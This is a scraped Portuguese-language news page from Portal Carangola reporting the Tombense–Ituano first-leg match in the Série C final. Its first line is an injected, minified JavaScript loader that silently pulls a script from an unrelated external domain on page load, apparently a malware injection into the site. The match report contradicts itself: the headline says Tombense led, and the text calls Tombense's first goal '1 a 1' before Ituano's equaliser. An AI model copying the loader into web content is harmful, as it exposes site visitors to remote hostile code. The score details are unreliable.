;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Série C: Tombense abre vantagem e Ituano busca empate na primeira decisão. - Portal Carangola

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Série C: Tombense abre vantagem e Ituano busca empate na primeira decisão.

Em Tombos, Tombense e Ituano abriram a final da Série C e ficaram no empate por 1 a 1, placar que deixa tudo em aberto para a próxima semana.
Calendário
O duelo da volta entre Tombense e Ituano está marcado para o próximo fim de semana, em Itu.
O jogo
Dentro de casa, a Tombense colocou o pé no acelerador e tentou envolver o Ituano desde os primeiros minutos, mas não conseguia criar chances claras.
Aos poucos, o Galo conseguiu conter o time adversário e levou perigo nas descidas. Em uma delas, Igor Henrique soltou o pé e acertou o travessão de Felipe Garcia.
Antes do intervalo, Jean Lucas teve a chance de marcar para a Tombense e viu Pegorari executar uma boa defesa.
Na etapa final os gols saíram. Logo aos 5 minutos, a Tombense furou a defesa do Ituano. No cruzamento de Manoel, a zaga afastou errado e Everton Galdino pegou firme, 1 a 1.
Na desvantagem, o Ituano saiu para o campo ofensivo e criou boas oportunidades. Por outro lado, a Tombense descia no contra-ataque e perdia algumas chances de sacramentar o triunfo.
A igualdade do Ituano veio apenas na reta final. No cruzamento da esquerda, Igor Henrique conseguiu empurrar para dentro da rede.